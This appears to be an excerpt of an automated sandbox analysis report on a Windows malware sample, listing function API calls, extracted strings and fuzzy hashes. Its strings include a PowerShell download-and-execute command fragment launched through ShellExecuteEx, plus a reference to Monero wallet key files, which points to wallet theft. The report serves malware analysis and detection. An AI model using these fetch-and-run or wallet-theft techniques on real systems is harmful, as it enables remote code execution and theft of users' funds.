                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD2D85
                    Strings
                    • <, xrefs: 00BD2D39
                    • ')", xrefs: 00BD2CB3
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BD2D04
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BD2CC4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: e09f63fab336649b9eddefdd2cb26e6dd71e355c30cb4d5aa2d0b8836c3685ea
                    • Instruction ID: 86fc97f4d2d9854281d2619ab71d40f5471993fcb4cbe25cfeaaa71274158021
                    • Opcode Fuzzy Hash: e09f63fab336649b9eddefdd2cb26e6dd71e355c30cb4d5aa2d0b8836c3685ea
                    • Instruction Fuzzy Hash: 8C41DE71D102489ADB14FBA0C891BEDF7B8AF10300F4041AAE406B6291FF756A8ADF95
                    Function 00BC9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                    Download Yara Rule
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BC9F41
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 73ab5d638e322f8100f8d414016e24b60feb4d5268cd4781f47a29537d92eebe
                    • Instruction ID: 9bfdfbc0d28d14e9a8942e10e2d02db04ffbe62330e453665833109b97435362
                    • Opcode Fuzzy Hash: 73ab5d638e322f8100f8d414016e24b60feb4d5268cd4781f47a29537d92eebe
                    • Instruction Fuzzy Hash: F0614070A1024C9BDB14EFA4CC96FEDB7F5AF54344F008458F90A6B291EBB46A45CB52
                    Function 00BD40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,013CD680,00000000,00020119,?), ref: 00BD40F4
                    • RegQueryValueExA.ADVAPI32(?,013CE5C0,00000000,00000000,00000000,000000FF), ref: 00BD4118
                    • RegCloseKey.ADVAPI32(?), ref: 00BD4122
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4147
                    • lstrcat.KERNEL32(?,013CE5D8), ref: 00BD415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID:
                    • API String ID: 690832082-0
                    • Opcode ID: fcd4f33bcf6a1c76f22a9acb24e677c587c8f00bca05ac1e33becfe9eb005c3d
                    • Instruction ID: 31d5483115ccdb60e512233d535e9cd2976d8cc40c41b660fdd4226fbb940a31
                    • Opcode Fuzzy Hash: fcd4f33bcf6a1c76f22a9acb24e677c587c8f00bca05ac1e33becfe9eb005c3d
                    • Instruction Fuzzy Hash: FD418DB690020CABDB14EBA0DC56FFD737DA758300F04459DB61567181EA759BCC8BE2
                    Function 00BD6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 00BD696C
                    • sscanf.NTDLL ref: 00BD6999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BD69B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BD69C0
                    • ExitProcess.KERNEL32 ref: 00BD69DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: 8776d30d15b7addbfbbf48e10df7a7664498405d313b6b3ae32ff91c45edb2df
                    • Instruction ID: e5aa4c852f6552c1f9c57523b61bdb76b5b6ff84f62488c07b367b3afb98631e
                    • Opcode Fuzzy Hash: 8776d30d15b7addbfbbf48e10df7a7664498405d313b6b3ae32ff91c45edb2df
                    • Instruction Fuzzy Hash: 1E21B875D1420CAFCF08EFE4D949AEEB7B9BF48300F04856AE406B3250EB355649CB69
                    Function 00BD7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,013BC3C8,00000000,00020119,?), ref: 00BD7E5E
                    • RegQueryValueExA.ADVAPI32(?,013CD8A0,00000000,00000000,000000FF,000000FF), ref: 00BD7E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00BD7E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: dbd0b0a4262c4863cd4de71cf4fba71252e5d75f138d32b44185943128500757
                    • Instruction ID: 13318426046e7c032801c7e5607aa46436fc62f5381a320d65bd74592604eeee
                    • Opcode Fuzzy Hash: dbd0b0a4262c4863cd4de71cf4fba71252e5d75f138d32b44185943128500757
                    • Instruction Fuzzy Hash: CF118FB1A44309EFD704CB95DC89FBBFBBCEB44700F1081AAF605A7280EB7558448BA1
                    Function 00BD9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • StrStrA.SHLWAPI(013CE3E0,?,?,?,00BD140C,?,013CE3E0,00000000), ref: 00BD926C
                    • lstrcpyn.KERNEL32(00E0AB88,013CE3E0,013CE3E0,?,00BD140C,?,013CE3E0), ref: 00BD9290
                    • lstrlen.KERNEL32(?,?,00BD140C,?,013CE3E0), ref: 00BD92A7
                    • wsprintfA.USER32 ref: 00BD92C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: bdab0ce51117fac07b0f0614afa425562d28f82bd75c15c6fb16486cad705cf6
                    • Instruction ID: 43d70270baca50f68c4df0bae89bfe412998a9f2adfd68ba08dd358874289ea3
                    • Opcode Fuzzy Hash: bdab0ce51117fac07b0f0614afa425562d28f82bd75c15c6fb16486cad705cf6
                    • Instruction Fuzzy Hash: 31010C7550020CFFCB04DFECC988EAE7BB9EB44350F188158F909AB240C671AA84DB91
                    Function 00BC12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BC12B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC12BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BC12D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BC12F5
                    • RegCloseKey.ADVAPI32(?), ref: 00BC12FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 422e30fd2e578190378a361f54775bf2a721c663e0fb897981e565f69f82bbe5
                    • Instruction ID: 68919327873eda5d3d06aba9fd956dd42e21cd9ff1a6dc5de50e216c07096426
                    • Opcode Fuzzy Hash: 422e30fd2e578190378a361f54775bf2a721c663e0fb897981e565f69f82bbe5
                    • Instruction Fuzzy Hash: BC011DB9A4030CBFDB04DFE5DC49FAEB7B8EB48701F048169FA05A7280D6719A458B61
                    Function 00BDC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: 239dbc79da72f4df27df8ddf3bfe9837a5da7f47ea6dc7d24e78e1e1649b3a85
                    • Instruction ID: a538c4378a45719f425a0d29082e23b35eb6504b3e482463bccae8e8d407518a
                    • Opcode Fuzzy Hash: 239dbc79da72f4df27df8ddf3bfe9837a5da7f47ea6dc7d24e78e1e1649b3a85
                    • Instruction Fuzzy Hash: B74105B150079D5EDB228B248D94FFBFFE89B45304F1444E9E9CA86282E2759A44DF60
                    Function 00BD6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BD6663
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD6726
                    • ExitProcess.KERNEL32 ref: 00BD6755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 40cc262e255cc264eb494755aece8f99343110874b178796ec3b4816a43056aa
                    • Instruction ID: 38469fdf51ba33b1881846a8d2e6bb215782568e523da28c46e6cefb06827f60
                    • Opcode Fuzzy Hash: 40cc262e255cc264eb494755aece8f99343110874b178796ec3b4816a43056aa
                    • Instruction Fuzzy Hash: 82312FB1801218ABDB14EB50DC95FDDB7B8AF44300F40519AF20976291EF756B88CF6A
                    Function 00BD87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BE0E28,00000000,?), ref: 00BD882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD8836
                    • wsprintfA.USER32 ref: 00BD8850
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: a8bc9711592e06e814efe04f65560d747c3bd93833305abd88ea6961105bd158
                    • Instruction ID: 13ce8b28d5549c2fe0b4dbc2e0cbb9b3c34901607b7abb96f0c3fb690a01038b
                    • Opcode Fuzzy Hash: a8bc9711592e06e814efe04f65560d747c3bd93833305abd88ea6961105bd158
                    • Instruction Fuzzy Hash: 182172B1A40308AFDB04DF95DD49FAEBBB8FB48701F144159F605B7280D77A9940CBA1
                    Function 00BD8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BD951E,00000000), ref: 00BD8D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD8D62
                    • wsprintfW.USER32 ref: 00BD8D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
